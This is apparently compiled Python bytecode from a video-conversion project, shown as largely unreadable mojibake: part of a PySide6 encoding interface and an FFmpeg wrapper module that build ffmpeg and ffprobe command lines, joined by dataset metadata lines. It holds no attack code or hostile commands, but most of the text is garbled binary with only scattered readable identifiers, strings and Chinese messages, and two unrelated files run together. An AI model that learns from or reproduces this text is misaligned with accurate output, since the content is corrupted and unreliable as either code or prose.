|j¦«dSdStdd|¬¦«}| ¦«rtj d¦«dStj d¦«dS) NrWu选择字幕文件u字幕文件 (*.srt *.ass)r r¡rEr¢r£) ršr¤r r™r]Ú lineEdit4r›r r§rnrp)rr�r¨s rr{zVencoInterface.open_file_4¦sÒ€Ø Œ>× Ò Ñ Ô  BÒ &Ğ &İ)4Ô)DÀTĞK_ĞacğfBñ*Cô*CÑ &ˆDÔ # QØÔ&ğ @Ø”×&Ò& tÔ'>Ñ?Ô?Ğ?Ğ?Ğ?ğ @ğ @õ˜8Ğ%BÈ4ĞPÑPÔPˆAØ�vŠv‰xŒxğ :İ” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9å” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9rcóf—|j ¦«rš|j d¦«d|j ¦«›d�|_| |j|j|j|j |j |j ¦«|_ |j  |j ¦«dS|j d¦«d|_| |j|j|j|j |j |j ¦«|_ |j  |j ¦«dS)NFú-s ú TrW)r~Ú isCheckedrarbr¤rPrUrNrOrQrRrSrTrirjr%s rr€z VencoInterface.enable_resolution¶s0€Ø Œ?× $Ò $Ñ &Ô &ğ AØ ŒM× %Ò % eÑ ,Ô ,Ğ ,Ø; D¤M×$6Ò$6Ñ$8Ô$8Ğ;Ğ;Ğ;ˆDŒOØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @à ŒM× %Ò % dÑ +Ô +Ğ +Ø ˆDŒOØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @rcó8—|j ¦«r€d|j ¦«›d�|_| |j|j|j|j|j |j ¦«|_ |j   |j ¦«dSdS)Nr¯r°)r~r±rar¤rPrUrNrOrQrRrSrTrirjr%s rr•z VencoInterface.change_resolutionÂs§€Ø Œ?× $Ò $Ñ &Ô &ğ AØ; D¤M×$6Ò$6Ñ$8Ô$8Ğ;Ğ;Ğ;ˆDŒOØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @ğ Ağ Arcóf—|j ¦«rš|j d¦«d|j ¦«›d�|_| |j|j|j |j|j |j ¦«|_ |j  |j ¦«dS|j d¦«d|_| |j|j|j |j|j |j ¦«|_ |j  |j ¦«dS)NFú-r r°TrW)r�r±rcrbr¤rQrUrNrOrPrRrSrTrirjr%s rr‚zVencoInterface.enable_fpsÉs0€Ø Œ?× $Ò $Ñ &Ô &ğ AØ ŒO× 'Ò '¨Ñ .Ô .Ğ .Ø6˜Tœ_×1Ò1Ñ3Ô3Ğ6Ğ6Ğ6ˆDŒHØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @à ŒO× 'Ò '¨Ñ -Ô -Ğ -؈DŒHØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @rcó8—|j ¦«r€d|j ¦«›d�|_| |j|j|j|j|j |j ¦«|_ |j   |j ¦«dSdS)Nr´r°)r�r±rcr¤rQrUrNrOrPrRrSrTrirjr%s rr–zVencoInterface.change_fpsÕs§€Ø Œ?× $Ò $Ñ &Ô &ğ AØ6˜Tœ_×1Ò1Ñ3Ô3Ğ6Ğ6Ğ6ˆDŒHØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @ğ Ağ ArcóZ—|j ¦«dks#d|j ¦«›d�|_nd|_d|_| |j|j|j|j|j|j¦«|_ |j   |j ¦«dS)NÚcopyz-vcodec r°z -vcodec copy rW) r…Ú currentTextrNrOrUrPrQrRrSrTrirjr%s rr‡zVencoInterface.change_vcodecÛs­€ØŒ}×(Ò(Ñ*Ô*¨fÒ4Ğ4ØC T¤]×%>Ò%>Ñ%@Ô%@ĞCĞCĞCˆDŒKˆKà)ˆDŒK؈DŒLØ"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<Ğ<Ğ<rcó�—|j ¦«|_|j ¦«dz|_|j ¦«dks:|j ¦«dks|j ¦«dkr| |j¦«dS| |j¦«dS)NéèõCRFå“�è´¨-mediumõCRFå“�è´¨-fastõCQP硬编å“�è´¨(*qsv))r’Úvaluer_r�r^rˆr¸Úchange_vpreset_subr%s rr‰zVencoInterface.change_vpresetäs׀ؔ~×+Ò+Ñ-Ô-ˆŒ Ø”|×)Ò)Ñ+Ô+¨dÑ2ˆŒ Ø Œ?× &Ò &Ñ (Ô (Ğ,>Ò >Ğ >À$Ä/×B]ÒB]ÑB_ÔB_ĞcsÒBsĞBsĞw{ôxG÷xSòxSñxUôxUğYpòxpğxpØ × #Ò # D¤LÑ 1Ô 1Ğ 1Ğ 1Ğ 1à × #Ò # D¤LÑ 1Ô 1Ğ 1Ğ 1Ğ 1rcóV—|j ¦«dkr d|›d�|_n£|j ¦«dkr d|›d�|_nz|j ¦«dkr d|›d�|_nQ|j ¦«dkr d |›d�|_n(|j ¦«d kr d |›d�|_| |j|j|j|j|j|j¦«|_ |j   |j ¦«dS) Nr»z-preset medium -crf r°r¼z-preset fast -crf õCBRå¹³å�‡ç �ç�‡-mediumz-preset medium -b:v õCBRå¹³å�‡ç �ç�‡-fastz-preset fast -b:v r½z-preset medium -qp ) rˆr¸rOrUrNrPrQrRrSrTrirj)rÚrates rr¿z!VencoInterface.change_vpreset_subìsH€Ø Œ?× &Ò &Ñ (Ô (Ğ,>Ò >Ğ >Ø9°$Ğ9Ğ9Ğ9ˆDŒLˆLØ Œ_× (Ò (Ñ *Ô *Ğ.>Ò >Ğ >Ø7°Ğ7Ğ7Ğ7ˆDŒLˆLØ Œ_× (Ò (Ñ *Ô *Ğ.FÒ FĞ FØ9°$Ğ9Ğ9Ğ9ˆDŒLˆLØ Œ_× (Ò (Ñ *Ô *Ğ.DÒ DĞ DØ7°Ğ7Ğ7Ğ7ˆDŒLˆLØ Œ_× (Ò (Ñ *Ô *Ğ.EÒ EĞ EØ8°Ğ8Ğ8Ğ8ˆDŒLØ"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<Ğ<Ğ<rcóô—|j ¦«dks|j ¦«dkr=|j ¦«dz|_| |j¦«dSdS)NrÁrÂrº)rˆr¸r�r¾r^r¿r%s rr‘zVencoInterface.change_bitrateúsu€Ø Œ?× &Ò &Ñ (Ô (Ğ,DÒ DĞ DÈÌ×HcÒHcÑHeÔHeĞiÒHĞHØœ<×-Ò-Ñ/Ô/°$Ñ6ˆDŒLØ × #Ò # D¤LÑ 1Ô 1Ğ 1Ğ 1Ğ 1ğI@ĞHrcó(—|j ¦«dks:|j ¦«dks|j ¦«dkr:|j ¦«|_| |j¦«dSdS)Nr»r¼r½)rˆr¸r’r¾r_r¿r%s rr“zVencoInterface.change_qualityÿs¯€Ø Œ?× &Ò &Ñ (Ô (Ğ,>Ò >Ğ >À$Ä/×B]ÒB]ÑB_ÔB_ĞcsÒBsĞBsĞw{ôxG÷xSòxSñxUôxUğYpòxpğxpØœ>×/Ò/Ñ1Ô1ˆDŒLØ × #Ò # D¤LÑ 1Ô 1Ğ 1Ğ 1Ğ 1ğxpğxprcóZ—|j ¦«dks#d|j ¦«›d�|_nd|_d|_| |j|j|j|j|j|j¦«|_ |j   |j ¦«dS)Nr·z-acodec r°z -acodec copy rW) rŠr¸rRrSrUrNrOrPrQrTrirjr%s rr‹zVencoInterface.change_acodecs­€ØŒ×*Ò*Ñ,Ô,°Ò6Ğ6ØE T¤_×%@Ò%@Ñ%BÔ%BĞEĞEĞEˆDŒKˆKà)ˆDŒK؈DŒLØ"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<Ğ<Ğ<rcó—d|j ¦«›d�|_| |j|j|j|j|j|j¦«|_ |j   |j ¦«dS)Nz-b:a r°) rŒr¸rSrUrNrOrPrQrRrTrirjr%s rr�zVencoInterface.change_apreset s„€Ø?˜tœ×:Ò:Ñ<Ô<Ğ?Ğ?Ğ?ˆŒ Ø"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<Ğ<Ğ<rcó.—|j ¦«ra|j d¦«|j ¦«dkr(d|_|j |j¦«dSdS|j d¦«dS)NTõ默认ú=-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k F)rƒr±rdrer¸rTrirjr%s rr„zVencoInterface.enable_profiles•€Ø Œ=× "Ò "Ñ $Ô $ğ .Ø ŒO× &Ò & tÑ ,Ô ,Ğ ,ØŒ×*Ò*Ñ,Ô,°Ò8Ğ8Ø&f�Ô#ØÔ"×/Ò/°Ô0CÑDÔDĞDĞDĞDğ9Ğ8ğ ŒO× &Ò & uÑ -Ô -Ğ -Ğ -Ğ -rcóü—|j ¦«r^|j ¦«rG|j ¦«dkr,d|_|j |j¦«dSdSdSdS)NrÉrÊ)rƒr±rdr†r¸rTrirjr%s rr�zVencoInterface.change_profiles�€Ø Œ=× "Ò "Ñ $Ô $ğ E¨¬×)KÒ)KÑ)MÔ)Mğ EØŒ×*Ò*Ñ,Ô,°Ò8Ğ8Ø&f�Ô#ØÔ"×/Ò/°Ô0CÑDÔDĞDĞDĞDğ Eğ Eğ Eğ EØ8Ğ8rc 󪇗‰j ¦«dk�s½‰j ¦«dk�sŸtj ‰j ¦«¦«�r‰j ¦«dk�rs‰j ¦«dk�rU‰j ¦«dk�rt‰j  ¦«dk�rV‰j   d¦«tdtjtj‰j ¦«‰j ¦«‰j ¦«¦«‰_t'‰j¦«‰_‰jj ˆfd„¦«‰jj ˆfd„¦«‰jj ‰jj¦«‰jj ‰jj¦«‰j ¦«dS‰j ¦«dkr‰j  ¦«dk�s†‰j   d¦«tdtjtj‰j ¦«‰j ¦«‰j ¦«‰j  ¦«‰j ¦«¦«‰_t'‰j¦«‰_‰jj ˆfd „¦«‰jj ˆfd „¦«‰jj ‰jj¦«‰jj ‰jj¦«‰j ¦«dSdSt5d d ‰¬ ¦«}| ¦«rt9jd¦«nt9jd¦«‰j d¦«‰j d¦«dSt5d d‰¬ ¦«}| ¦«rt9jd¦«dSt9jd¦«dS‰j ¦«dk�rä‰j ¦«dk�rƉj ¦«dk�s¨‰j›d‰j ›d�‰_!t5d d‰j›d‰j ›�‰¬ ¦«}| ¦«�rDtEj#‰d‰j ¦«d¦«\}}tdtjtj‰j ¦«|‰j!¦«‰_t'‰j¦«‰_‰jj ˆfd„¦«‰jj ˆfd„¦«‰jj ‰jj¦«‰jj ‰jj¦«‰j ¦«dSt9jd¦«dS‰j ¦«dkso‰j ¦«dkrTt5dd‰¬ ¦«}| ¦«rt9jd¦«dSt9jd¦«dSdSdS)NrWz 0:00:00:000u'执行简å�•转ç �任务,请ç¨�ç­‰...r"có8•—‰j d¦«S©Nu开始视频转ç �©rgrhr%s€rú<lambda>z)VencoInterface.encoding.<locals>.<lambda>1󸀏D¼L×<XÒ<XĞYmÑ<nÔ<n€rcó8•—‰j d¦«S©Nu完æˆ�视频转ç �rÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda>2󸀏T¼\×=YÒ=YĞZnÑ=oÔ=o€ru!执行切割任务,请ç¨�ç­‰...r có8•—‰j d¦«SrÎrÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda>;rÑrcó8•—‰j d¦«SrÓrÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda><rÔruæ��示u6音频或字幕功能暂未å®�ç�°ï¼Œè¯·ç­‰å¾…æ›´æ–°ï¼�rEu确认,关闭æ��示窗å�£uå�–消,关闭æ��示窗å�£u输入文件ä¸�存在ï¼�r°u<进行音频转ç �,请选择输出文件,转ç �æ ¼å¼�为rŸrªr!có8•—‰j d¦«S)Nu开始音频转ç �rÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda>]sø€°D´L×4PÒ4PĞQeÑ4fÔ4f€rcó8•—‰j d¦«S)Nu完æˆ�音频转ç �rÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda>^sø€°T´\×5QÒ5QĞRfÑ5gÔ5g€rr u请选择输出文件ï¼�r¢r£)$ršr¤r¦rkrlrmr«r­ÚtimeEditÚ timeEdit_2rgrhrrrrriÚ toPlainTextr?r=ÚthreadÚstartedrtr#Ú deleteLaterÚstartr r§rnrpr›rRrSrTr r¥)rr¨Úaudio_output_file_pathr�s` rr}zVencoInterface.encoding$sOø€ğŒ~×"Ò"Ñ$Ô$¨Ò*Ñ*°4´>×3FÒ3FÑ3HÔ3HÈBÒ3NÑ3NåŒw�~Š~˜dœn×1Ò1Ñ3Ô3Ñ4Ô4ñ) >Ø”>×&Ò&Ñ(Ô(¨BÒ.Ñ.°4´>×3FÒ3FÑ3HÔ3HÈBÒ3NÑ3Nà”}×)Ò)Ñ+Ô+¨}Ò<Ñ<ÀÄ×AUÒAUÑAWÔAWĞ[hÒAhÑAhØœ ×4Ò4Ğ5^Ñ_Ô_Ğ_å&,¨^½VÔ=OÕQWÔQdĞfjÔft×fyÒfyÑf{Ôf{ğ~Bô~L÷~Qò~Qñ~Sô~SğUYôUg÷UsòUsñUuôUuñ'vô'v˜œ İ&2°4´;Ñ&?Ô&?˜œ Øœ Ô+×3Ò3Ğ4nĞ4nĞ4nĞ4nÑoÔoĞoØœ Ô,×4Ò4Ğ5oĞ5oĞ5oĞ5oÑpÔpĞpØœ Ô,×4Ò4°T´[Ô5LÑMÔMĞMØœ Ô,×4Ò4°T´[Ô5LÑMÔMĞMØœ ×)Ò)Ñ+Ô+Ğ+Ğ+Ğ+Ø!œ]×/Ò/Ñ1Ô1°]ÒBĞBÈ$Ì/×J^ÒJ^ÑJ`ÔJ`ĞdqÒJqÑJqØœ ×4Ò4Ğ5XÑYÔYĞYå&,¨_½fÔ>PÕRXÔReĞgkÔgu×gzÒgzÑg|Ôg|ğCôM÷RòRñTôTğVZôVc÷VhòVhñVjôVjğlpôl{÷l@òl@ñlBôlBğDHôDV÷DbòDbñDdôDdñ'eô'e˜œ İ&2°4´;Ñ&?Ô&?˜œ Øœ Ô+×3Ò3Ğ4nĞ4nĞ4nĞ4nÑoÔoĞoØœ Ô,×4Ò4Ğ5oĞ5oĞ5oĞ5oÑpÔpĞpØœ Ô,×4Ò4°T´[Ô5LÑMÔMĞMØœ Ô,×4Ò4°T´[Ô5LÑMÔMĞMØœ ×)Ò)Ñ+Ô+Ğ+Ğ+Ğ+ğKrĞJqõ# 8Ğ-eĞnrĞsÑsÔs�AØ—v’v‘x”xğBİœ Ğ%@ÑAÔAĞAĞAåœ Ğ%@ÑAÔAĞAØ”N×*Ò*¨2Ñ.Ô.Ğ.Ø”N×*Ò*¨2Ñ.Ô.Ğ.Ğ.Ğ.õ˜xĞ)CÈDĞQÑQÔQ�Ø—6’6‘8”8ğ>İ”LĞ!<Ñ=Ô=Ğ=Ğ=Ğ=å”LĞ!<Ñ=Ô=Ğ=Ğ=Ğ=à Œ^× Ò Ñ "Ô " bÒ (Ñ (¨T¬^×-@Ò-@Ñ-BÔ-BÀbÒ-HÑ-HĞQUÔQ_×QdÒQdÑQfÔQfĞjlÒQlÑQlØ%)¤[Ğ"BĞ"B°4´<Ğ"BĞ"BĞ"BˆDÔ å˜8ğ&AĞdhÔdoğ&Ağ&AĞrvÔr~ğ&Ağ&AğJNğOñOôOˆAØ�vŠv‰xŒxñ :İ,7Ô,GÈĞNbĞdhÔdr×dwÒdwÑdyÔdyğ|Eñ-Fô-FÑ)Ğ&¨å$ ^µVÔ5GÍÔI\Ğ^bÔ^l×^qÒ^qÑ^sÔ^sğvLğNRôNañbôb�” İ*¨4¬;Ñ7Ô7�” Ø” Ô#×+Ò+Ğ,fĞ,fĞ,fĞ,fÑgÔgĞgØ” Ô$×,Ò,Ğ-gĞ-gĞ-gĞ-gÑhÔhĞhØ” Ô$×,Ò,¨T¬[Ô-DÑEÔEĞEØ” Ô$×,Ò,¨T¬[Ô-DÑEÔEĞEØ” ×!Ò!Ñ#Ô#Ğ#Ğ#Ğ#å” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9ğ ”×$Ò$Ñ&Ô&¨"Ò,Ğ,°´×1DÒ1DÑ1FÔ1FÈ"Ò1LĞ1Lå˜8Ğ%?ÈĞMÑMÔMˆAØ�vŠv‰xŒxğ :İ” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9å” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9ğ -Ğ,Ğ1LĞ1Lrr)r7r8r9rrUrHrIrJrKrurwryr{r€r•r‚r–r‡r‰r¿r‘r“r‹r�r„r�r}r:r;s@rrCrC9s¯ø€€€€€ğğğğğğğğğğğğğ"*ğ*ğ*ğ Jğ Jğ Jğ=ğ=ğ=ğ:9ğ9ğ9ğ :ğ :ğ :ğ9ğ9ğ9ğ :ğ :ğ :ğ Ağ Ağ AğAğAğAğ Ağ Ağ AğAğAğAğ =ğ=ğ=ğ2ğ2ğ2ğ =ğ =ğ =ğ2ğ2ğ2ğ 2ğ2ğ2ğ =ğ=ğ=ğ=ğ=ğ=ğ .ğ.ğ.ğEğEğEğK:ğK:ğK:ğK:ğK:ğK:ğK:rrC)rnrkÚPySide6.QtCorerrrrÚ PySide6.QtGuirrr ÚPySide6.QtWidgetsr r r Úqfluentwidgetsr Úmodules.configrÚmodules.ffmpegApirÚmodules.Ui_vencoInterfacerrprrrr=rCrMrrú<module>rès™ğØ€€€Ø € € € à7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ø3Ğ3Ğ3Ğ3Ğ3Ğ3Ğ3Ğ3Ğ3Ğ3Ø?Ğ?Ğ?Ğ?Ğ?Ğ?Ğ?Ğ?Ğ?Ğ?Ø%Ğ%Ğ%Ğ%Ğ%Ğ%à!Ğ!Ğ!Ğ!Ğ!Ğ!Ø$Ğ$Ğ$Ğ$Ğ$Ğ$Ø-Ğ-Ğ-Ğ-Ğ-Ğ-ğ  €„ Ğ ?¨6Ô+=Ğ ?Ğ ?Ñ@Ô@Ğ@Ø €„ Ğ A¨FÔ,?Ğ AĞ AÑBÔBĞBğRğRğRğRğRˆWñRôRğRğ:&ğ&ğ&ğ&ğ&�7ñ&ô&ğ&ğv:ğv:ğv:ğv:ğv:�W˜gñv:ôv:ğv:ğv:ğv:r
30,908
Python
.py
59
522.813559
3,657
0.286062
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,463
ffmpegApi.cpython-311.pyc
wish2333_VideoExtractAndConcat/modules/__pycache__/ffmpegApi.cpython-311.pyc
§ »ÏIf+>ãóT—ddlZddlZddlZddlZddlZddlmZGd„d¦«ZdS)éN)ÚffpathcóÜ—eZdZejejddfd„Zdd„Zd„Zd„Z d„Z d „Z d „Z d „Z dd„Z dd„Z dd„Zd d„Z d!d„Z d!d„Z d"d„Z d#d„Z d$d„Z d#d„ZdS)%ÚFFmpegFNcó>—||_||_||_||_dS©N)Ú ffmpeg_pathÚ ffprobe_pathÚinterrupt_flagÚcallback)Úselfrr r r s õMq:\Git\FFmpeg-python\code-version-pre4.0-多界é�¢å¼€å�‘\modules\ffmpegApi.pyÚ__init__zFFmpeg.__init__s'€ğ 'ˆÔØ(ˆÔØ,ˆÔØ ˆŒ ˆ ˆ óTcó—||_dSr)r )r Úflags r Úupdate_interrupt_flagzFFmpeg.update_interrupt_flags€Ø"ˆÔĞĞrcóš—|jstjd¦«|j¯tjd¦«| ¦«dS)Néuffmpegapi检测到中断请求)r ÚtimeÚsleepÚloggingÚinfoÚ interrupt_run©r s r Úcheck_interrupt_flagzFFmpeg.check_interrupt_flagsR€ØÔ%ğ å ŒJ�q‰MŒMˆMğÔ%ğ õ Œ Ğ5Ñ6Ô6Ğ6Ø ×ÒÑÔĞĞĞrcó¶—|jr½tjd¦«|j ¦«|j d¬¦«|j ¦«€|j ¦«t|j ¦«r|  ¦«d|_tjd¦«tjd¦«dS)Nuå°�试终止FFmpeg进程é)ÚtimeoutFuFFmpeg进程强制终止uffmpegapi中断请求已处ç�†) r rrÚpÚ terminateÚwaitÚpollÚkillÚcallabler rs r rzFFmpeg.interrupt_run"s¶€Ø Ô ğ 5å ŒLĞ3Ñ 4Ô 4Ğ 4Ø ŒF× Ò Ñ Ô Ğ Ø ŒF�KŠK ˆKÑ "Ô "Ğ "ØŒv�{Š{‰}Œ}Ğ$Ø”— ’ ‘ ” � ݘœ Ñ&Ô&ğ Ø— ’ ‘”�Ø"'ˆDÔ İ ŒLĞ3Ñ 4Ô 4Ğ 4İŒ Ğ5Ñ6Ô6Ğ6Ğ6Ğ6rcó—d} |jg|z}d |¦«}tjd|›�¦«t j|tjtj¬¦«|_tj |j ¬¦«}d|_ |  ¦«| ¦«rtjd¦«ntjd¦« |jj ¦« d¦«}|s|j ¦«�n(ŒOtj| ¦«¦«Œu|j ¦«\}}|jjd krLtjd | d¦«›�¦«t/| d¦«¦«‚nq#t0$r}tjd ¦«|‚d}~wt2$r}tjd ¦«|‚d}~wt.$r} tjd | ›�¦«| ‚d} ~ wwxYw tjd¦«|rL| ¦«r:d|_| ¦«d|_tjd¦«dSdSdS#tjd¦«|rK| ¦«r8d|_| ¦«d|_tjd¦«wwwxYw)Nú uå°�试执行:)ÚstdoutÚstderr)ÚtargetTuå�¯åŠ¨å®ˆå�«çº¿ç¨‹æˆ�功uå�¯åŠ¨å®ˆå�«çº¿ç¨‹å¤±è´¥zutf-8ru$命令执行失败,错误信æ�¯ï¼šuZ找ä¸�到ffmpeg或ffprobe命令,请检查ffmpeg_pathå’Œffprobe_path是å�¦æ­£ç¡®é…�置。ucffmpeg或ffprobe命令没有执行æ�ƒé™�,请检查ffmpeg_pathå’Œffprobe_path是å�¦æ­£ç¡®é…�置。u执行FFmpeg命令失败:uFFmpeg命令执行完æˆ�Fu守å�«çº¿ç¨‹é€€å‡º)rÚjoinrrÚ subprocessÚPopenÚPIPEÚSTDOUTrÚ threadingÚThreadrÚdaemonÚstartÚis_aliveÚerrorr'ÚreadlineÚdecoder"ÚstripÚ communicateÚ returncodeÚ ExceptionÚFileNotFoundErrorÚPermissionErrorr ) r ÚcmdÚtÚcmd_strÚlineÚoutÚerrÚ fnf_errorÚp_errorÚes r Úrunz FFmpeg.run2s!€ğ ˆğ0 3ØÔ#Ğ$ sÑ*ˆCØ—h’h˜s‘m”mˆGİ ŒLĞ4¨7Ğ4Ğ4Ñ 5Ô 5Ğ 5åÔ%Øİ!”İ!Ô(ğñôˆDŒFõ Ô ¨Ô(AĞBÑBÔBˆA؈AŒHØ �GŠG‰IŒIˆIØ�zŠz‰|Œ|ğ :İ” Ğ7Ñ8Ô8Ğ8Ğ8å” Ğ8Ñ9Ô9Ğ9ğ +Ø”v”}×-Ò-Ñ/Ô/×6Ò6°wÑ?Ô?�Øğ!à”v—{’{‘}”}Ğ0Øà İ” ˜TŸZšZ™\œ\Ñ*Ô*Ğ*ğ +ğ”v×)Ò)Ñ+Ô+‰HˆC�ØŒvÔ  AÒ%Ğ%İ” ĞYÀCÇJÂJÈwÑDWÔDWĞYĞYÑZÔZĞZİ § ¢ ¨7Ñ 3Ô 3Ñ4Ô4Ğ4ğ&øõ!ğ ğ ğ İ ŒMĞwÑ xÔ xĞ x؈Oøøøøİğ ğ ğ İ ŒMğAñ Bô Bğ B؈Møøøøİğ ğ ğ İ ŒMĞ;¸Ğ;Ğ;Ñ <Ô <Ğ <؈Gøøøøğ øøøğ&õ ŒLĞ3Ñ 4Ô 4Ğ 4Øğ 3�Q—Z’Z‘\”\ğ 3Ø&*�Ô#Ø—’‘”�Ø&+�Ô#İ” Ğ1Ñ2Ô2Ğ2Ğ2Ğ2ğ  3ğ 3ğ 3ğ 3øõ ŒLĞ3Ñ 4Ô 4Ğ 4Øğ 3�Q—Z’Z‘\”\ğ 3Ø&*�Ô#Ø—’‘”�Ø&+�Ô#İ” Ğ1Ñ2Ô2Ğ2Ğ2ğ  3ğ 3øøøsC„GG Ç J$Ç H:ÇG,Ç, H:Ç9HÈ H:ÈH5È5H:È:J$Ê$A$Lcó.—| dg¦«S)Nz-version)rFrs r ÚversionzFFmpeg.versionis€Ø�xŠx˜˜ Ñ%Ô%Ğ%rcóÜ—|jdddddd|g}tjdd |¦«z¦«t j|d d ¬ ¦«}|j ¦«}|stjd ¦«dS t|¦«}tjd t|¦«z¦«|S#t$r)}tj d t|¦«¦«|‚d}~wwxYw)Nz-vr4z -show_entrieszformat=durationz-ofz"default=noprint_wrappers=1:nokey=1u 执行:r&T)Úcapture_outputÚtextu5ffprobe 输出为空,无法è�·å�–视频æŒ�ç»­æ—¶é—´u视频总秒数为:u0转æ�¢è§†é¢‘æŒ�续时间为浮点数时出错:) r rrr*r+rFr'r7ÚwarningÚfloatÚstrÚ ValueErrorr4)r Ú input_fileÚcmd1Úresultr'ÚdurationrEs r Ú get_durationzFFmpeg.get_durationmsú€ğ Ô Ø �'˜?Ğ,=¸uĞFjØ ğ ˆõ Œ �[ 3§8¢8¨D¡>¤>Ñ1Ñ2Ô2Ğ2İ” °TÀĞEÑEÔEˆà”×$Ò$Ñ&Ô&ˆØğ İ ŒOĞSÑ TÔ TĞ TØ�4ğ ݘV‘}”}ˆHİ ŒLĞ0µ3°x±=´=Ñ@Ñ AÔ AĞ A؈Oøİğ ğ ğ İ ŒMĞLÍcĞRSÉfÌfÑ UÔ UĞ U؈Gøøøøğ øøøsÂ4B8Â8 C+Ã$C&Ã&C+có¸—tj|¦«| d¦«\}}}}t|¦«}t|¦«}|dz|dzzt|¦«z}|t|¦«dz z }||z }tjd|¦«t |d¦«\} } t | d¦«\} } d| | | fz} tjd| ¦«| S)NÚ:ié<ièu结æ�Ÿæ—¶é—´ç‚¹ä¸ºï¼šz%02d:%02d:%06.3f)rrÚsplitrMÚdivmod) r rSÚendÚhoursÚminutesÚsecondsÚ millisecondsÚ end_floatÚend_time_floatÚmÚsÚhÚend_times r Útime_calculatezFFmpeg.time_calculate…s݀݌ �SÑÔĞà03· ² ¸#±´Ñ-ˆˆw˜ İ�e‘ ” ˆİ˜‘.”.ˆØ˜D‘L 7¨R¡<Ñ/µ%¸±.´.Ñ@ˆ Ø•U˜<Ñ(Ô(¨4Ñ/Ñ/ˆ Ø! IÑ-ˆİŒ Ğ,¨nÑ=Ô=Ğ=å�n bÑ)Ô)‰ˆˆ1İ�a˜‰}Œ}‰ˆˆ1Ø%¨¨A¨q¨ Ñ1ˆİŒ Ğ,¨hÑ7Ô7Ğ7؈rú-c:v copy -c:a copyú-ycóP—tj|¦«D�]}| d¦«ràtj ||¦«}tj |¦«stj|¦«tj ||¦«} | |¦«} | | |¦«} d|d|d| ddd|›d�|d| ›d�g } |  | ¦«tj |dz¦«Œøtj |d z¦«�ŒdS) Nú.mp4ú -hide_bannerú-ssú-toú-accurate_seekú-iú"õ视频截å�–完æˆ�õä¸�是mp4文件,跳过) ÚosÚlistdirÚendswithÚpathr*ÚexistsÚmakedirsrTrerFrr) r Ú input_folderÚ start_timerZÚ output_folderÚencoderÚ overwriteÚfilerPÚ output_filerSrdr=s r Ú extract_videozFFmpeg.extract_video—s9€õ”J˜|Ñ,Ô,ğ @ñ @ˆDØ�}Š}˜VÑ$Ô$ğ @İœWŸ\š\¨,¸Ñ=Ô=� å”w—~’~ mÑ4Ô4ğ/İ”K  Ñ.Ô.Ğ.İ œgŸlšl¨=¸$Ñ?Ô?� à×,Ò,¨ZÑ8Ô8�à×.Ò.¨x¸Ñ=Ô=�ğ#ØØ˜:ؘ8Ø$ØĞ+˜jĞ+Ğ+Ğ+ØØ&˜ Ğ&Ğ&Ğ&ğ(�ğ—’˜‘ ” � İ” ˜TĞ$8Ñ8Ñ9Ô9Ğ9Ğ9å” ˜TĞ$>Ñ>Ñ?Ô?Ğ?Ñ?ğ5 @ğ @rc óL—|dd…dz|dd…z}| |¦«}| ||¦«}d|d|d|ddd |›d �|d |›d �g } | | ¦«tj |¦«} t j| d z¦«dS© Néú.érjrkrlrmrnrorp)rTrerFrrruÚbasenamerr) r rPr~ryrZr{r|rSrdr=r}s r Úextract_video_singlezFFmpeg.extract_video_single½sˀ𠠠 ”^ cÑ)¨J°q°r°r¬NÑ:ˆ à×$Ò$ ZÑ0Ô0ˆà×&Ò& x°Ñ5Ô5ˆğ Ø Ø �:Ø �8Ø Ø Ğ#�jĞ#Ğ#Ğ#Ø Ø � Ğ Ğ Ğ ğ ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rc ó&—|dd…dz|dd…z}|dd…dz|dd…z}d|d|d|ddd |›d �|d |›d �g }| |¦«tj |¦«}t j|d 